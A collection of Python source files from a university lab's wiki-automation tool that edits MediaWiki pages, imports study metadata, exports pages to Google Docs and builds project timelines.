"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport sys\nimport re\n\ndef newtext(name, content):\n return \"\"\"\n{{Self Report Measure\n|Name=%s\n|Reference=\n|Duration=\n|Cost=\n|License terms=\n|Constructs=\n|Studies using measure=\n}}\n==Author's Description==\n\nTODO\n\n==Brief Description for Publications==\n\nTODO: Here is the text you would paste in grants, papers, IRB protocols, and so on.\n\n==Sample questions==\n\nTODO\n\n==Materials==\n%s\n\n==Psychometrics==\n\n==Discussion==\n\n===Internal Findings===\n\n===Publications With Relevant Findings===\n\n\n{{RSC.css}}\n[[Category:Self Report Measure]]\n \"\"\" % (name, content)\n\ndef run(mother):\n library = mother.pages[\"Self-Report Library\"]\n p = mwparserfromhell.parse(library.text())\n for link in p.filter_wikilinks():\n if \"[[:Category\" in link: continue\n title = str(link.title).replace(\"_\", \" \")\n page = mother.pages[title]\n if page.exists:\n measure = mwparserfromhell.parse(page.text())\n\n if \"[[Category:Self Report Measure]]\" in measure: continue\n if \"#REDIRECT\" in measure: continue\n\n logging.info(\"Updating page\", title)\n\n # trim out link to Self-Report Library, not needed in category mode\n for measure_link in measure.filter_wikilinks():\n if \"Library\" in measure_link.title \\\n and \"Self\" in measure_link.title \\\n and \"Report\" in measure_link.title:\n measure.remove(measure_link)\n\n # Fix whitespace\n trimmed = re.sub(\"\\n{2,}\", str(measure), \"\\n\\n\").strip()\n\n output = newtext(title, trimmed)\n page.save(output, \"Automated edit to move self reports into category\")\n\n\n"
},
{
"alpha_fraction": 0.5891583561897278,
"alphanum_fraction": 0.5891583561897278,
"avg_line_length": 40.20588302612305,
"blob_id": "4901e8d1361c06d2578bb7e217af76af510acef4",
"content_id": "0cabb9edf77e8ecf60bf3658e06f474b772f1881",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 34,
"path": "/renameregex.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\n\ndef run(mother, matching, regex, replacement):\n logging.info(f\"Renaming pages matching `{matching}` replacing `{regex}` with `{replacement}`\")\n hits = mother.search(matching, what=\"title\")\n matcher = re.compile(matching)\n for hit in list(hits):\n title = hit.get('title')\n if not matcher.match(title):\n logging.debug(f\"Skipping hit {title}\")\n continue\n logging.info(f\"Checking page {title}\")\n page = mother.pages[title]\n # NOTE: Checking page.redirects_to was throwing API errors.\n if \"#REDIRECT\" in page.text():\n continue\n logging.info(f\"Page is not a redirect\")\n name = page.name\n regex = re.compile(regex)\n new_name = regex.sub(replacement, name)\n if name != new_name:\n logging.info(f\"Renaming `{name}` to `{new_name}`\")\n # Check for a redirect or existing page at new name\n existing_page = mother.pages[new_name]\n if existing_page:\n if \"#REDIRECT\" in existing_page.text():\n logging.warning(f\"Deleting existing redirect at `{new_name}`\")\n existing_page.delete()\n else:\n logging.warning(f\"Could not rename, there is already a page at `{new_name}`\")\n page.move(new_name)\n\n"
},
{
"alpha_fraction": 0.5091946721076965,
"alphanum_fraction": 0.5091946721076965,
"avg_line_length": 29.921567916870117,
"blob_id": "6e9af466e425ca1764167404fb1cedb5ae757f55",
"content_id": "0309eac482e5ba0e3c21df57e7bb4aa0d470cd7b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 51,
"path": "/gdocmappings.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import os\nimport json\n\nclass GDocMappings:\n def __init__(self, path):\n self.path = path\n if os.path.exists(path):\n with open(path) as json_file:\n data = json.load(json_file)\n self.title_to_id = data['title_to_id']\n self.id_to_title = data['id_to_title']\n self.ids_that_link_to_id = data['ids_that_link_to_id']\n self.do_not_convert = data['do_not_convert']\n self.file_to_id = data['file_to_id']\n\n else:\n self.title_to_id = {}\n self.id_to_title = {}\n self.ids_that_link_to_id = {}\n self.do_not_convert = []\n self.file_to_id = {}\n\n def save(self):\n data = {\n 'title_to_id': self.title_to_id,\n 'id_to_title': self.id_to_title,\n 'ids_that_link_to_id': self.ids_that_link_to_id,\n 'do_not_convert': self.do_not_convert,\n 'file_to_id': self.file_to_id,\n }\n\n with open(self.path, 'w') as f:\n json.dump(data, f)\n\n def add(self, title, document_id):\n title = self.normalize(title)\n self.title_to_id[title] = document_id\n self.id_to_title[document_id] = title\n self.save()\n\n \n def normalize(self, title):\n # NOTE: Probably more stuff here\n return title.replace(\"_\", \" \")\n\n def get_id_for_title(self, title):\n title = self.normalize(title)\n if title in self.title_to_id:\n return self.title_to_id[title]\n else:\n return None\n"
},
{
"alpha_fraction": 0.4920158088207245,
"alphanum_fraction": 0.493438720703125,
"avg_line_length": 40.33333206176758,
"blob_id": "ef8f0ee233b1d52c86b13b01f1154eb9be46207e",
"content_id": "97a5c1f78361f41e45476403e8f6a7575e29e69c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6325,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 153,
"path": "/gdoclinks.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import logging\nimport re\nimport urllib.parse\nfrom apiclient.http import MediaFileUpload\nfrom apiclient.errors import HttpError\n\nGOOGLE_DOCS_PREFIX = \"https://docs.google.com/document/d/\"\nGOOGLE_DRIVE_PREFIX = \"https://drive.google.com/file/d/\"\n\nclass GDocLinks:\n def __init__(self, wiki, driver, file_prefix, folder_id):\n \"\"\"\n Needs a mwclient wiki connection, a GDocDriver, a file_prefix where we \n can stash files, the mappings so we can save what links to what and \n what file IDs represent what wiki files, and the folder_id in Drive to \n store new files\n \"\"\"\n self.wiki = wiki\n self.driver = driver\n self.file_prefix = file_prefix\n self.mappings = driver.mappings\n self.folder_id = folder_id\n\n\n def check_links(self, doc_id):\n \"\"\"\n Updates any links with \"wiki://\" prefixes if they exist in the \n driver's mappings to the resulting doc or file ID\n \"\"\"\n logging.info(f\"Re-linking inside doc {doc_id}\")\n try:\n document = self.driver.get_document(doc_id)\n except HttpError as e:\n logging.warning(f\"HttpError when trying to read doc {doc_id}: {e}\")\n return\n\n content = document['body']['content']\n requests = []\n\n doc_id_regex = re.compile('docs.google.com/document/d/([^/]{40,})', re.IGNORECASE)\n category_regex = re.compile(r'[^a-zA-Z0-9.!@$%&*()/]', re.IGNORECASE)\n\n # Now we walk the AST looking for links\n # Links are stored as 'link' properties inside the 'textStyle'\n # properties of 'textRun' elements.\n def check_for_link(element, start_index, end_index):\n if not 'link' in element:\n return False\n\n link = element['link']\n if 'url' in link:\n url = link['url']\n else:\n return False\n\n if url.startswith(\"wiki://\"):\n # Check in mappings for something with that title\n _, title = url.split(\"://\", 2)\n\n # Regularize the title\n title = title.replace(\"Media:\", \"File:\")\n title = title.lstrip(\":\")\n\n if title.startswith(\"File:\"):\n # Title is... sometimes URI encoded\n clean_title = urllib.parse.unquote(title)\n\n if clean_title in self.mappings.file_to_id:\n file_url = GOOGLE_DRIVE_PREFIX + self.mappings.file_to_id[clean_title]\n else:\n # TODO: Merge this stuff into a central place so initial conversion can do it, too?\n # Bring file over, store in mappings\n filename = self.file_prefix + \"/\" + clean_title\n try:\n logging.debug(f\"Downloading wiki file {clean_title} to {filename}\")\n wiki_file = self.wiki.pages[clean_title]\n with open(filename, 'wb') as fd:\n wiki_file.download(fd)\n except KeyError as e:\n logging.warning(f\"File '{title}' cleaned as '{clean_title}' not found in wiki when checking links in {doc_id}\")\n return False\n\n file_metadata = {\n 'name': clean_title.replace(\"File:\", \"\"),\n 'mimeType': '*/*',\n 'parents': [self.folder_id],\n }\n media = MediaFileUpload(filename,\n mimetype='*/*',\n resumable=True)\n\n result = self.driver.drive.files().create(\n body=file_metadata,\n media_body=media,\n supportsAllDrives=True,\n fields='id').execute()\n file_id = result.get('id')\n\n self.mappings.file_to_id[clean_title] = file_id\n file_url = GOOGLE_DRIVE_PREFIX + file_id\n\n logging.info(f\"Linking {title}, cleaned as {clean_title}, to {file_url}\")\n request = self.fix_link(start_index, end_index, file_url)\n requests.append(request)\n\n elif \"Category:\" in title:\n _, category = url.split(\"Category:\", 2)\n category = category.strip()\n category = category_regex.sub(\"-\", category)\n self.driver.add_tag(doc_id, category)\n\n elif title in self.mappings.title_to_id:\n doc_url = GOOGLE_DOCS_PREFIX + self.mappings.title_to_id[title]\n request = self.fix_link(start_index, end_index, doc_url)\n requests.append(request)\n\n else:\n match = doc_id_regex.search(url)\n if match:\n # Track this link in our mappings\n link_doc_id = match.group(1)\n if not link_doc_id in self.mappings.ids_that_link_to_id:\n self.mappings.ids_that_link_to_id[link_doc_id] = []\n\n if not doc_id in self.mappings.ids_that_link_to_id[link_doc_id]:\n self.mappings.ids_that_link_to_id[link_doc_id].append(doc_id)\n\n for item in content:\n self.driver.traverse(check_for_link, item, 0, 0)\n\n # Because indexes and content aren't changing through these edits,\n # we can send them as a batch in any order, hooray\n if requests:\n logging.info(f\"Found {len(requests)} links in need of updating, sending batch\")\n self.driver.batch_update(doc_id, requests)\n self.mappings.save()\n\n\n def fix_link(self, start_index, end_index, url):\n return {\n \"updateTextStyle\": {\n \"textStyle\": {\n \"link\": {\n \"url\": url\n }\n },\n \"range\": {\n \"startIndex\": start_index,\n \"endIndex\": end_index\n },\n \"fields\": \"link\"\n }\n }\n\n"
},
{
"alpha_fraction": 0.5512629747390747,
"alphanum_fraction": 0.5532441735267639,
"avg_line_length": 37.82692337036133,
"blob_id": "38f10be7a6e58aea21e3446caf64b38c7ff77347",
"content_id": "fe828923063ebd62b2758a6a52f6ab3b52cc98c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4038,
"license_type": "permissive",
"max_line_length": 196,
"num_lines": 104,
"path": "/selfreportlibrary.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\n\n# Adds cost, duration, and item info to construct list for each measure \ndef details(mpage):\n mtext = mpage.text()\n mp = mwparserfromhell.parse(mtext)\n cost = \"\"\n duration = \"\"\n items = \"\"\n for template in mp.filter_templates():\n if template.has(\"Cost\"):\n cost = template.get(\"Cost\").value.strip()\n if '[' in cost:\n url = re.findall(r'(https?://\\S+)', cost)\n cost = \"[\" + url[0] + \"]\"\n if \".pdf\" in url[0]:\n cost = \"[\" + url[0]\n if cost != \"\":\n cost = \"Cost: \" + cost\n if template.has(\"Duration\"):\n duration = template.get(\"Duration\").value.strip()\n if duration != \"\":\n duration = \"Duration: \" + duration\n if template.has(\"Number of items\"):\n items = template.get(\"Number of items\").value.strip()\n if items != \"\":\n items = \"Items: \" + items\n info = [cost, duration, items]\n inf = [value for value in info if value]\n return inf\n return []\n \n\ndef run(mother):\n category = mother.categories['Self Report Measure']\n constructs = {}\n has_constructs = []\n missing_constructs = []\n for page in category:\n logging.debug(\"Checking self report\", page.name)\n text = page.text()\n p = mwparserfromhell.parse(text)\n for template in p.filter_templates():\n if template.has(\"Constructs\"):\n s = template.get(\"Constructs\").value.strip()\n if s == \"\": continue\n words = re.split(r',\\s*', s)\n for c in words:\n constructs[c] = constructs.get(c, [])\n constructs[c].append(page.name)\n has_constructs.append(page.name)\n\n if not page.name in has_constructs:\n missing_constructs.append(page.name)\n\n logging.debug(\"Got constructs: \", constructs)\n\n # Now constructs contains a hash of construct -> list of pages.\n # NOTE: This re-uses MediaWiki's category CSS classes to get three-column display. Maybe weird to do that?\n oldtext = category.text()\n cat = mwparserfromhell.parse(oldtext)\n sections = cat.get_sections()\n title = \"== Sorted by Construct ==\"\n newtext = title + \"\\n\\nPlease note: this section is created automatically based on the constructs in each measure's infobox. To edit, go to the measure's page and choose 'Edit with form'.\\n\\n\"\n newtext += \"<div class='mw-category'>\"\n\n # Build up an index by construct\n for k in sorted(constructs.keys()):\n newtext += \"<div class='mw-category-group'><h3>\" + k + \"</h3>\\n\"\n for measure in constructs[k]:\n mpage = mother.pages[measure]\n inf = details(mpage)\n # Only add measure info if it exists in page template\n if inf != []:\n newtext += \"* [[\" + measure + \"]] - (\" + \", \".join(inf) + \")\\n\"\n else :\n newtext += \"* [[\" + measure + \"]]\\n\"\n newtext += \"</div>\"\n \n # List out things that are missing constructs\n newtext += \"<div class='mw-category-group'><h3>No constructs listed</h3>\\n\"\n for m in missing_constructs:\n mpage = mother.pages[m]\n inf = details(mpage)\n # Only add measure info if it exists in page template\n if inf != []:\n newtext += \"* [[\" + m + \"]] - (\" + \", \".join(inf) + \")\\n\"\n else:\n newtext += \"* [[\" + m + \"]]\\n\"\n newtext += \"</div>\"\n\n newtext += \"</div>\\n\\n\"\n \n # Replace the \"Sorted by Construct\" section with our new text\n old_section = cat.get_sections(matches = \"Sorted by Construct\")[0]\n cat.replace(old_section, newtext)\n newpage = str(cat)\n\n if oldtext != newpage:\n logging.warning(\"Updating self-report category page, change detected\")\n category.save(newpage, \"Automated edit to build construct categories on self-report library\")\n"
},
{
"alpha_fraction": 0.6653696298599243,
"alphanum_fraction": 0.6653696298599243,
"avg_line_length": 41.75,
"blob_id": "58bb51a2e6b53a0ebbbede63b980d50cc613d54d",
"content_id": "94a2687e4b1841f2461545a58ba15444a2ac95e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 514,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 12,
"path": "/addcategory.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\n\ndef run(mother, category_name, matching):\n logging.info(f\"Adding category `{category_name}` to pages matching `{matching}`\")\n hits = mother.search(matching, what=\"title\")\n for hit in list(hits):\n page = mother.pages[hit.get('title')]\n if not category_name in page.categories() and not page.redirects_to():\n logging.info(f\"Adding `{category_name}` to `{page.name}`\")\n page.append(f\"[[Category:{category_name}]]\")\n\n"
},
{
"alpha_fraction": 0.7219335436820984,
"alphanum_fraction": 0.7279168367385864,
"avg_line_length": 51.057376861572266,
"blob_id": "9bc243318e4f31580c76ef19441b0a9c1bab86b3",
"content_id": "1c1e63b3e5d899e0e1b45d90ca79b5d4ddedd7b2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6351,
"license_type": "permissive",
"max_line_length": 412,
"num_lines": 122,
"path": "/factuator.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import argparse\nimport logging\nimport coloredlogs\n\nimport mwclient\nimport mwparserfromhell\n\nimport auth_store\n\nparser = argparse.ArgumentParser(description='Automate the wiki.')\nparser.add_argument('-v', '--verbose', action='count')\nparser.add_argument('-s', '--study', help='Update study pages', action='store_true')\nparser.add_argument('--selfreport', help='Create initial self report pages (DO NOT RUN, for one-time use)', action='store_true')\nparser.add_argument('--selfreportlibrary', help='Update self report library', action='store_true')\nparser.add_argument('--medialinks-category', help='Update File: to Media: links in given category', action='append')\nparser.add_argument('--medialinks-page', help='Update File: to Media: links on given page', action='append')\nparser.add_argument('--redirectlinks-page', help='Update redirected links in given pages', action='append')\nparser.add_argument('--redirectlinks-category', help='Update redirected links in category')\nparser.add_argument('--studylibrary', help='Update study library', action='store_true')\nparser.add_argument('--studyimporter', metavar=\"CSV\", help='Create study pages from given tsv')\nparser.add_argument('--timeline', help='Create or update timeline page based on Category:Study, Category:Project, and Category:Grant', action='store_true')\nparser.add_argument('--studyreport', help='Generate CSV report about studies', action='store_true')\nparser.add_argument('--add-category', nargs=2, metavar=('category', 'match'), help='Add category `category` to pages with `match` in the title')\nparser.add_argument('--rename-category', nargs=2, metavar=('old', 'new'), help='Rename category `old` to `new`')\nparser.add_argument('--rename-regex', nargs=3, metavar=('match', 'regex', 'result'), help='Rename all pages with `match` in the title replacing `regex` with `result`')\nparser.add_argument('--export-gdoc', nargs=5, metavar=('wiki_prefix', 'file_prefix', 'http_prefix', 'drive_id', 'unsorted_folder_id'), help='Export wiki with `wiki_prefix` to google drive at `drive_id` creating unsorted folders in `unsorted_folder_id` for eventual gdocwiki use where `file_prefix` allows public-internet-visible viewing of files at `http_prefix` [EXPERIMENTAL]')\nparser.add_argument('--export-gdoc-single', nargs=6, metavar=('wiki_prefix', 'file_prefix', 'http_prefix', 'drive_id', 'unsorted_folder_id', 'page_title'), help='Export single wiki page with `wiki_prefix` to google drive at `drive_id` creating unsorted folders in `unsorted_folder_id` for eventual gdocwiki use where `file_prefix` allows public-internet-visible viewing of files at `http_prefix` [EXPERIMENTAL]')\nparser.add_argument('--link-gdoc', nargs=4, metavar=('file_prefix', 'drive_id', 'files_folder_id', 'folder_id'), help='Walk folder with `folder_id` and repair links based on stored mappings [EXPERIMENTAL]')\nparser.add_argument('--link-gdoc-single', nargs=4, metavar=('file_prefix', 'drive_id', 'files_folder_id', 'doc_id'), help='Repair links in doc based on stored mappings [EXPERIMENTAL]')\nparser.add_argument('-f', '--force', help='Force whatever changes instead of trying to be precise about updates', action='store_true')\nparser.add_argument('-n', '--older', metavar=\"ISO_DATE\", help='Update pages not updated since a given date')\nparser.add_argument('-a', '--all', help='Run all known automated updates', action='store_true')\nargs = parser.parse_args()\n\nif args.verbose:\n if args.verbose > 1:\n coloredlogs.install(level='DEBUG')\n elif args.verbose > 0:\n coloredlogs.install(level='INFO')\nelse:\n coloredlogs.install(level='WARN')\n\nauth = auth_store.get_auth()\nuser = auth[0]\n\nua = 'factuator/0.1 run by User:' + user\nmother = mwclient.Site('wiki.keck.waisman.wisc.edu', path='/wikis/mother/', httpauth=auth)\n\nif args.study:\n import study\n study.run(mother)\nelif args.selfreport:\n import selfreport\n selfreport.run(mother)\nelif args.selfreportlibrary:\n import selfreportlibrary\n selfreportlibrary.run(mother)\nelif args.medialinks_category:\n import medialinks\n medialinks.run_categories(mother, args.medialinks_category)\nelif args.medialinks_page:\n import medialinks\n medialinks.run_pages(mother, args.medialinks_page)\nelif args.redirectlinks_page:\n import redirectlinks\n redirectlinks.run_pages(mother, args.redirectlinks_page)\nelif args.redirectlinks_category:\n import redirectlinks\n redirectlinks.run_category(mother, args.redirectlinks_category)\nelif args.studyimporter:\n import studyimporter\n studyimporter.run(mother, args.studyimporter)\nelif args.studylibrary:\n import studylibrary\n studylibrary.run(mother)\nelif args.timeline:\n import timeline\n timeline.run(mother)\nelif args.studyreport:\n import studyreport\n studyreport.run(mother)\nelif args.add_category:\n import addcategory\n addcategory.run(mother, args.add_category[0], args.add_category[1])\nelif args.rename_category:\n import renamecategory\n renamecategory.run(mother, args.rename_category[0], args.rename_category[1])\nelif args.rename_regex:\n import renameregex\n renameregex.run(mother, args.rename_regex[0], args.rename_regex[1], args.rename_regex[2])\nelif args.all:\n import study\n study.run(mother)\n import studylibrary\n studylibrary.run(mother)\n import selfreportlibrary\n selfreportlibrary.run(mother)\n import timeline\n timeline.run(mother)\nelif args.export_gdoc:\n import gdocdriver\n gdocdriver.export_mediawiki(mother, args.export_gdoc[0],\n args.force, args.older,\n args.export_gdoc[1], args.export_gdoc[2],\n args.export_gdoc[3], args.export_gdoc[4])\nelif args.export_gdoc_single:\n import gdocdriver\n gdocdriver.export_mediawiki(mother, args.export_gdoc_single[0],\n args.force, args.older,\n args.export_gdoc_single[1], args.export_gdoc_single[2],\n args.export_gdoc_single[3], args.export_gdoc_single[4],\n args.export_gdoc_single[5])\nelif args.link_gdoc:\n import gdocdriver\n gdocdriver.link_folder(mother, args.link_gdoc[0], args.link_gdoc[1],\n args.link_gdoc[2], args.link_gdoc[3])\nelif args.link_gdoc_single:\n import gdocdriver\n gdocdriver.link_doc(mother, args.link_gdoc_single[0], args.link_gdoc_single[1], \n args.link_gdoc_single[2], args.link_gdoc_single[3])\nelse:\n parser.print_help()\n"
},
{
"alpha_fraction": 0.6572251319885254,
"alphanum_fraction": 0.6586653590202332,
"avg_line_length": 34.91379165649414,
"blob_id": "19c18211b40db6765f2ea0949c0a18234cff5c37",
"content_id": "19278dbdaa716e7d5e41b6892d12054290105a29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2083,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 58,
"path": "/studyimporter.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport csv\nimport sys\nfrom utilities import study_template\n\ndef importer(mother, row, boilerplate):\n title = row[\"Study Short Name\"]\n logging.info(\"Importing %s\" % title)\n\n page = mother.pages[title]\n oldtext = page.text()\n if oldtext != \"\":\n logging.warning(\"Collision on study page %s\" % title)\n return\n \n p = mwparserfromhell.parse(oldtext)\n\n p.insert(0, boilerplate)\n p.insert(0, \"{{Study}}\")\n\n template = study_template(p)\n template.add(\"AKA\", row[\"AKA\"])\n template.add(\"PIs\", row[\"PIs\"])\n template.add(\"Project Manager\", row[\"Project Manager\"])\n template.add(\"Current Contact\", row[\"Current Contact\"])\n template.add(\"Short Description\", row[\"Short Description\"])\n template.add(\"Website\", row[\"Website\"])\n template.add(\"Start Date\", row[\"Start Date\"])\n template.add(\"End Date\", row[\"End Date\"])\n template.add(\"Projected Enrollment\", row[\"Projected Enrollment\"])\n template.add(\"Current Enrollment\", row[\"Current Enrollment\"])\n template.add(\"Study Status\", row[\"Study Status\"])\n template.add(\"IRB Number\", row[\"IRB Number\"])\n template.add(\"Grant Number\", row[\"Grant Number\"])\n template.add(\"Funding Source\", row[\"Funding Source\"])\n template.add(\"ARROW URL\", row[\"ARROW URL\"])\n template.add(\"Study Drive Name\", row[\"Study Drive Name\"])\n if row[\"ClinicalTrials.Gov URL\"] != \"N/A\":\n template.add(\"ClinicalTrials.Gov\", row[\"ClinicalTrials.Gov URL\"])\n\n # insert into page at top section\n overview = row[\"General Overview Paragraph\"]\n if overview not in p:\n p.insert(0, overview)\n\n newtext = str(p)\n if oldtext != newtext:\n page.save(newtext, \"Automated edit to create page from metadata\")\n\ndef run(mother, csvpath):\n logging.info(\"Opening %s\" % csvpath)\n with open(csvpath) as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n boilerplate = mother.pages['Template:Study boilerplate'].text()\n for row in reader:\n importer(mother, row, boilerplate)\n"
},
{
"alpha_fraction": 0.5380875468254089,
"alphanum_fraction": 0.541329026222229,
"avg_line_length": 36.96154022216797,
"blob_id": "f49975b2702b06731f0961abcdd7ff29777c518d",
"content_id": "4abd5370bdd6b4a0f0c60c0e9ca356e45a325105",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4942,
"license_type": "permissive",
"max_line_length": 158,
"num_lines": 130,
"path": "/jarvis.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import psycopg2\nimport psycopg2.extras\n\n# NOTE: You will need to `kinit` a kerberos token to make this db connection work\n\nclass Jarvis:\n def __init__(self):\n self.db = psycopg2.connect(\"postgresql://togarashi.keck.waisman.wisc.edu/bi?krbsrvname=postgres\")\n\n def select(self, x):\n cursor = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(x)\n return cursor.fetchall()\n\n def select_list(self, x):\n cursor = self.db.cursor()\n cursor.execute(x)\n return cursor.fetchall()\n\n def columns(self, table):\n return self.select_list(\"select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = '%s'\" % table)\n\n def tables(self):\n return self.select(\"select relname from pg_class where relkind='r' and relname !~ '^(pg_|sql_)';\")\n\n def study(self, study_id):\n return self.select(\"SELECT folder, name, current_subjects, total_subjects FROM studies WHERE id = %s\" % study_id)\n\n\n def quotas(self, study_id):\n return self.select(\"SELECT * FROM quotas where startdate < current_date AND enddate > current_date AND study_id = %s\" % study_id)\n\n def total_active_quota(self, study_id):\n return \"{}gb\".format(sum([quota['quotagb'] for quota in self.quotas(study_id)]))\n\n\n def protocols(self, study_id):\n return self.select(\"SELECT protocol, expiration FROM irb_protocols p JOIN irb_studies s ON p.id = s.irb_protocol_id WHERE s.study_id = %s\" % study_id)\n\n def irb_expirations(self, study_id):\n irbs = self.protocols(study_id)\n if len(irbs) == 1:\n return str(irbs[0][1])\n else:\n return \", \".join([\"{} expires {}\".format(p[0], p[1]) for p in irbs])\n\n\n def people(self, study_id):\n return self.select(\"\"\"SELECT p.id, p.first, p.last, ip.pi, ip.admin, ip.irb_alerts FROM irb_studies s\n JOIN irb_people ip ON ip.irb_protocol_id = s.irb_protocol_id\n JOIN people p on p.id = ip.person_id\n WHERE s.study_id = %s\n ORDER BY ip.pi DESC, ip.admin DESC, ip.irb_alerts DESC, ip.created_at ASC\"\"\" % study_id)\n\n def personnel(self, study_id):\n # We want a table of people and whether they are a PI, admin, and/or irb_alert_thinger\n # And now we also want groups\n\n group_info = self.select(\"\"\"SELECT concat(p.first, ' ', p.last), ag.name, ag.id FROM irb_studies s\n JOIN irb_protocols irb ON s.irb_protocol_id = irb.id\n JOIN irb_protocol_acgroups ipa ON irb.id = ipa.irb_protocol_id\n JOIN account_groups ag on ipa.acgroup_id = ag.id\n JOIN account_group_members gm on gm.group_id = ag.id\n JOIN account_groups ag2 on ag2.id = gm.member_id\n JOIN people p on ag2.person_id = p.id\n WHERE NOT ag2.isgroup AND p.first IS NOT NULL AND p.first != '' AND study_id = %s\n ORDER BY ag.id ASC, p.last ASC, p.first ASC\"\"\" % study_id)\n\n group_map = {}\n group_ids = {}\n all_groups = []\n people_map = {}\n all_people = []\n\n for p in self.people(study_id):\n name = \"{first} {last}\".format(**p)\n if not name in all_people:\n all_people.append(name)\n people_map[name] = p\n\n for x in group_info:\n name = x[0]\n group = x[1]\n group_ids[group] = x[2]\n if not name in all_people:\n all_people.append(name)\n if not group in all_groups:\n all_groups.append(group)\n if name in group_map:\n group_map[name].append(group)\n else:\n group_map[name] = [group]\n\n table = \"\"\"{| class=\"wikitable\" style=\"text-align:left;\"\\n!Name\\n!PI\\n!Admin\"\"\"\n for g in all_groups:\n table += \"\\n![https://brainimaging.waisman.wisc.edu/members/jarvis/account_groups/{} {}]\".format(group_ids[g], g)\n\n for name in all_people:\n table += \"\\n|-\\n\"\n table += \"\\n|\"\n\n if name in people_map:\n p = people_map[name]\n table += \"'''\" + name + \"'''\"\n \n table += \"\\n|\"\n if p['pi']:\n table += \"✓\"\n\n table += \"\\n|\"\n if p['admin']:\n table += \"✓\"\n\n else:\n table += name\n table += \"\\n|\"\n table += \"\\n|\"\n\n for g in all_groups:\n table += \"\\n|\"\n if name in group_map:\n if g in group_map[name]:\n table += \"✓\"\n\n table += \"\\n|}\"\n\n\n title = \"=== JARVIS Personnel ===\"\n link = \"\"\"This information is auto-populated from [https://brainimaging.waisman.wisc.edu/members/jarvis/studies/{} JARVIS].\"\"\".format(study_id)\n return title + \"\\n\\n\" + link + \"\\n\\n\" + table + \"\\n\\n\"\n\n"
},
{
"alpha_fraction": 0.5690776705741882,
"alphanum_fraction": 0.5809889435768127,
"avg_line_length": 34.943660736083984,
"blob_id": "ec1854b916c35dcda5f16a60d8e2d767b227d076",
"content_id": "5a9643db828f11fc6edf6f2fb55d50a23176ec2a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12763,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 355,
"path": "/timeline.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nfrom datetime import date, datetime\nfrom dateutil.relativedelta import relativedelta\nfrom collections import defaultdict\nfrom functools import reduce\nimport operator\nimport sys\n\ntoday = datetime.today()\nten_months = relativedelta(months=10)\nsix_months = relativedelta(months=6)\ntwo_months = relativedelta(months=2)\n\nWIKI_URL = \"https://wiki.keck.waisman.wisc.edu/wikis/mother/index.php\"\n\nTO_EXTRACT = {\n 'Grant': [\n 'Letter of Intent Due', 'Submission Date',\n ],\n 'Project': [\n 'Planning Start Date',\n 'Project Start Date', 'Project End Date',\n ],\n 'Study': [\n 'Start Date', 'End Date',\n 'Planning Start Date', 'Piloting Start Date', 'Collecting Start Date',\n ],\n}\n\ndef color_for_bar_kind(bar_kind):\n if bar_kind == \"Planning\":\n return '#dae'\n if bar_kind == \"Piloting\":\n return '#ed8'\n if bar_kind == \"Collecting\":\n return '#aed'\n if bar_kind == \"Writing\":\n return '#daa'\n if bar_kind == \"Project\":\n return '#ade'\n return '#ccc'\n\ndef append_rows(normal_rows, truncated_rows, study, bar_kind, s, e):\n color = color_for_bar_kind(bar_kind)\n\n normal_rows.append(\"[ '{0}', '{1}', '{2}', new Date({3}, {4}, {5}), new Date({6}, {7}, {8})]\".format(\n study, bar_kind, color, s.year, s.month, s.day, e.year, e.month, e.day))\n\n if e <= today - two_months or s >= today + ten_months:\n return\n if e >= today + ten_months:\n e = today + ten_months\n if s <= today - two_months:\n s = today - two_months\n\n truncated_rows.append(\"[ '{0}', '{1}', '{2}', new Date({3}, {4}, {5}), new Date({6}, {7}, {8})]\".format(\n study, bar_kind, color, s.year, s.month, s.day, e.year, e.month, e.day))\n\ndef make_html(title, markup):\n return \\\n\"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"utf-8\">\n<title>CHM Timelines: \"\"\" + title + \"\"\"</title>\n<style type=\"text/css\">\nbody {\n font-family: sans-serif;\n background-color: #eee;\n}\n\n.timeline-wrapper {\n overflow-x: scroll;\n overflow-y: scroll;\n width: 100%;\n min-height: 100px;\n border: 1px solid #aaa;\n background-color: 